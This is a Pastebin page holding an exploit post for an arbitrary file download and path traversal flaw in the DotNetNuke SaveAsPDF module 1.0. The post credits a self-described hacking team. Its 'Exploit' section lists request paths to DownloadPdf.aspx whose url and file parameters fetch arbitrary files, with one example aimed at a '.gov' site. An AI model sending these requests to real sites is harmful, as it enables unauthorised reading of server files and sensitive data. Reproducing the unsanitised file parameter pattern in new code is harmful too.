API tools faq
paste
KingSkrupellos

DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download

KingSkrupellos
Mar 11th, 2019
63
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.81 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 12/03/2019
  7. # Vendor Homepage : bizmodules.net ~ dnnsoftware.com
  8. # Software Information Links :
  9. bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx
  10. bizmodules.net/portals/0/downloads/sap.pdf
  11. # Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Vulnerability Type :
  16. CWE-200 [ Information Exposure ]
  17. CWE-23 [ Relative Path Traversal ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke
  27.  
  28. websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including
  29.  
  30. texts, pictures and even flash contents.
  31.  
  32. ####################################################################
  33.  
  34. # Impact :
  35. ***********
  36. * DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download
  37.  
  38. arbitrary files because the application fails to sufficiently sanitize user-supplied input.
  39.  
  40. An attacker can exploit this issue to download arbitrary files within the context of the
  41.  
  42. web server process and obtain potentially sensitive informations and it works for
  43.  
  44. open redirection vulnerability.
  45.  
  46. * An information exposure is the intentional or unintentional disclosure of information to an actor
  47.  
  48. that is not explicitly authorized to have access to that information.
  49.  
  50. * The software uses external input to construct a pathname that should be within a
  51.  
  52. restricted directory, but it does not properly neutralize sequences such as ".." that
  53.  
  54. can resolve to a location that is outside of that directory.
  55.  
  56. ####################################################################
  57.  
  58. # Arbitrary File Download Exploit :
  59. *******************************
  60. /DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov
  61.  
  62. /DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]
  63.  
  64. /DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]
  65.  
  66. Note : It can download any random website as pdf file in to your computer and
  67.  
  68. it downloads a system files from DNNSoftware.
  69.  
  70. ####################################################################
  71.  
  72. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  73.  
  74. ####################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!